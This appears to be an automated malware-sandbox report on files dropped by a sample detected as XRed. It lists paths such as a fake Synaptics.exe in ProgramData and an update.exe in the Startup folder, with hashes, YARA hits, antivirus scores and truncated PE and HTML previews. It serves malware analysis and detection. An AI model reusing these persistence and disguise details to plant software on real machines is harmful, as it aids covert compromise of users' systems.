                                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                                                      C:\ProgramData\Synaptics\Synaptics.exe

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1989120
                                                                                                                                                      Entropy (8bit):6.934025794433937
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24576:8nsJ39LyjbJkQFMhmC+6GD9bhloDX0XOf44e7JFtxAnWe2fxYBQl:8nsHyjtk2MYC5GDxhloJfXnWbfxp
                                                                                                                                                      MD5:290A46D2614F4CE4F7AD75D2CEA2CE23
                                                                                                                                                      SHA1:CC9F762B21F649252881087B2FF56E88D4B5A6F1
                                                                                                                                                      SHA-256:7CBE965FA1278BA09C31E191C19AC1E2B52F940B656273872C805833AE03E276
                                                                                                                                                      SHA-512:2A6D87585971CF166D4DF1B2BCFE80A8B066D1CF4CBF646ADDF0735B62644AB5D9624B635AA1BA89B0B36107FD2899BEC2F95D6A55D2FAFF579272E1E758FE98
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                      • Filename: JPS.exe, Detection: malicious, Browse
                                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exe

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\wscript.exe
                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1989120
                                                                                                                                                      Entropy (8bit):6.934025794433937
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24576:8nsJ39LyjbJkQFMhmC+6GD9bhloDX0XOf44e7JFtxAnWe2fxYBQl:8nsHyjtk2MYC5GDxhloJfXnWbfxp
                                                                                                                                                      MD5:290A46D2614F4CE4F7AD75D2CEA2CE23
                                                                                                                                                      SHA1:CC9F762B21F649252881087B2FF56E88D4B5A6F1
                                                                                                                                                      SHA-256:7CBE965FA1278BA09C31E191C19AC1E2B52F940B656273872C805833AE03E276
                                                                                                                                                      SHA-512:2A6D87585971CF166D4DF1B2BCFE80A8B066D1CF4CBF646ADDF0735B62644AB5D9624B635AA1BA89B0B36107FD2899BEC2F95D6A55D2FAFF579272E1E758FE98
                                                                                                                                                      Malicious:true
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exe, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exe, Author: Joe Security
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                      • Filename: JPS.exe, Detection: malicious, Browse
                                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\2JZpUCL.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.261723765688538
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0ASU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+j+pAZewRDK4mW
                                                                                                                                                      MD5:13E32C33D9B5ED9D2E0AF2B57D7A398B
                                                                                                                                                      SHA1:789863C3034140DA1D6C210282E8FC9EBB932FEB
                                                                                                                                                      SHA-256:6B8D418AEEC80B5089F9DEF9C2321157BD1E38B5E838D5946586140923C4742A
                                                                                                                                                      SHA-512:BFF596E197C28F2D71A4AD72687E9573208F393F7F1F7C2507ED07E4E046205D066D3BA4A9CB47CF35D0EB6CCCA19ADB4A68C84BAA7955743DB868A5161DD977
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MzmVsB1_2Q3KgKMVgcriNQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\3XZ85pC.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.255874357955027
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+081SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+X1+pAZewRDK4mW
                                                                                                                                                      MD5:5871D9820D49F3A821C80FA4EF7B9DD3
                                                                                                                                                      SHA1:1535A292E373CCEEA9677815C83008FE86E66729
                                                                                                                                                      SHA-256:91FF9EF071AE0903CCA1F7A1104BC3F58CAC403FCC5838E685FF64AF0275C757
                                                                                                                                                      SHA-512:9DB8B0C3DC79177CF346FC83C7A76B07E24559063A49D7D6B7310138339BEF94DA935F4BFA163178BC06B6977F7395F21A467FE46CA6DA89B8F09897B5F6D13E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xH6yh2T2-MdCnffbpCA7Mg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\3yBZI3Z.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2599240442611555
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0YSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+L+pAZewRDK4mW
                                                                                                                                                      MD5:01D6B8814881975B0F972F50952329A2
                                                                                                                                                      SHA1:F93AF56C7794C4A4F5EDAD2213303AC189C9B363
                                                                                                                                                      SHA-256:D9824A37932ABD27B1003AF826BFA9B78E8F6F846814EAFCC5012B30A4C7161D
                                                                                                                                                      SHA-512:C7CE34BED90EF81BE919FB506FF61AA072ED1837269EF14449CDA628BA7420289D9C95AF625916889D50AEB80971418E59CAB137408E5203566F6817345575BA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CEkf-Pw7TiRG2Xr1xPtDYw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\4YNPp9H.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2665907764262645
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0eXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+/X+pAZewRDK4mW
                                                                                                                                                      MD5:573231530FD1627E94DD75A7469E099C
                                                                                                                                                      SHA1:68951118BE2E287D04B91B56B57EAD7643300A7E
                                                                                                                                                      SHA-256:983F6AEF9C818C44A6793E30F5D61D2E936EA86177C0CBDE299E100F52A1512A
                                                                                                                                                      SHA-512:6C51BEC7C725A245890DA7FA00CF0B4360811A145F1CFF5F30724371FB38B0549B8B72CCA164711235FC0C15C910BFDB59968803AE2FA54507D866A6C7B2D8AA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-ql-jTEMSq8fIMoaRuIPAg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\5wU59Hu.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.265789536587981
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0sgrSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+I+pAZewRDK4mW
                                                                                                                                                      MD5:12A13F048241DF5D80B0EF8C6E71D16A
                                                                                                                                                      SHA1:5018E5DC52734A70AD223B9D804C4F7FB39BDA1B
                                                                                                                                                      SHA-256:395BECE8954C4962B0C4450595EDFBC26C3E31A5E2A19BB51195C91683D04D4A
                                                                                                                                                      SHA-512:45523E4D56CE7A379E19928AF754140429D4E351A6E762B243501E3E235468480917BB8A86AAC426479101C7419F6DAB09C203A048F49B0B881568852FB76FBA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NWpYp5z9065FON__Lb-eIA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\5xQ6xPV.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.273602629902625
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0FxDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+k+pAZewRDK4mW
                                                                                                                                                      MD5:296595562583320C4764F8B7BA5553FC
                                                                                                                                                      SHA1:88ACEF17D044D22863A039E599FB6992A439966B
                                                                                                                                                      SHA-256:206E8B6FF2A5CC5999172117579D2714222FA8B504DA9D7805B96A8DB36AE6FA
                                                                                                                                                      SHA-512:1EA4A1F9C1D1B9209382B99AB5396453F5CEF8D03902CF25CC500FF8C9A98B5E72ADD180E981D389286D9DEB354288E89074D35FB42BB4E8B4F5BD47C113BD4D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="37_MZJ6kvE0KYvw7szPGSg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\6x8TGNb.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2564374179301945
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0xdSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Cd+pAZewRDK4mW
                                                                                                                                                      MD5:316B25EA4E9C42F48F5D2E662E7695DE
                                                                                                                                                      SHA1:C070BC22FA4570662D33A4829AF3F346F8A7ECD1
                                                                                                                                                      SHA-256:78100AE38B22EBC8267E27FE8AC6553E1911E9B01BC457974AD67820385E11CC
                                                                                                                                                      SHA-512:26CF998443073090E666ED934B44B2206127B05B6AC8DA66A8682AC528742359A27B64E6EDA70D9C43CBFD3C1DFEA1F68A2575D29F78767F8D2A011FDE8BB0AD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="RfpSzQsvXxaTOl9Xa5fk4w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\7WIvXpQ.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.262947916079587
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+02SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+t+pAZewRDK4mW
                                                                                                                                                      MD5:ACF77909DBC4BC9AC2C0190E4466320B
                                                                                                                                                      SHA1:C1E96AF56380A2B9A1A26FA77A01756BC278F0FD
                                                                                                                                                      SHA-256:A6B1C01651F1218131607E4E15CBB5E3283D5D2C64E4831F59D0FD776E01E6E5
                                                                                                                                                      SHA-512:C8D61B1769E64CDB5B5D06C57EE21F17E1F2E24383F1156C71B2090530B91798954321BC2775F6DE8569991C02C5010A17469F5A35D7B64C5ED8275748990067
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ElKK7AUoZeL3EesvUHrHgQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\8EnTDxJ.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.251033281055357
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0kPFSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+/F+pAZewRDK4mW
                                                                                                                                                      MD5:C6A75848CA11409961FB79C73D698E00
                                                                                                                                                      SHA1:24C85C17E4C9146CFB82A0DE8D0E8FBA37F920B1
                                                                                                                                                      SHA-256:BED946636F47173E94E506F8201F7491E9CF76CA6638EE263F3D78785443868B
                                                                                                                                                      SHA-512:F8799E4EC76BADA9410367E150710FB311CACF2610C19C79343058F18CEED27A59C96627096C16689021ED28213AC16D55C182F4103666247F520E4363E1C50E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5rXaxq-VGopdfsfqRP0Zfw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\8eLGm8U.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.273840798975782
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0EW5SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+NW5+pAZewRDK4mW
                                                                                                                                                      MD5:ABD3F9340E71188BB9E6438A0BDB3700
                                                                                                                                                      SHA1:B2979DEB04132784C5D2F823E627C59BE276CB8F
                                                                                                                                                      SHA-256:0E16D41E5C21A4EA4B9608AD8493A20D322BB3A5D4749F85EC672B85D60CB775
                                                                                                                                                      SHA-512:2CC2149322D4200931383215AEC3312D5413FC9EA467F6F316CADB3D1CAF1ACBAEBA2D2A042049DCDFA0B000D3EF75A894AB3C33548090298D1DA556D63CCBC4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vWE8S4YIhr6IqQmro_NOAQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\8vd4kIG.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.2781505363643175
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+0mSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+5+pAZewRDK4mW
                                                                                                                                                      MD5:92BC7FA8918E7D2FD1F2F2316D460C6A
                                                                                                                                                      SHA1:003B0E28436D5DD0E07C69CD7BD2940207F334B9
                                                                                                                                                      SHA-256:051B040EDAE8FC8510794C856464992EF12AB7E2AC3153221DFEE1D4D93FD658
                                                                                                                                                      SHA-512:A8703F1C3218DDCF4B352CFECF21745CAFD7C0C86003DDBDDA938F54DAD237F4298B376A1D01E0E89FB96D90D3DCF63331BBE75199B47E278ECB54EDB819AB76
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jRtOFuYv6IQB7bWHZwtYqw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\8y2nIAE.ini

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1652
                                                                                                                                                      Entropy (8bit):5.257646528436729
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:GgsF+08rSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Hr+pAZewRDK4mW
                                                                                                                                                      MD5:2B1F7D2585DA9C9AD1F14059CDB53F8A
                                                                                                                                                      SHA1:09A0706DB69B038A5F34FEB063D1E70DAFCF62C5
                                                                                                                                                      SHA-256:3E72C09E8029C0BBABF8DFE59C43FBADBC67D1AFDE2B9E576C8E1DFF91521D78
                                                                                                                                                      SHA-512:F748D3D9C00DD0568CE8E86A1A49AB3CDF63A906C2D8D4B65E403AF8B5F63783381A1738062EDDC8D4463F53343360FC57E456FED4F983451213DACCAB1B829E
                                                                                                                                                      Malicious:false
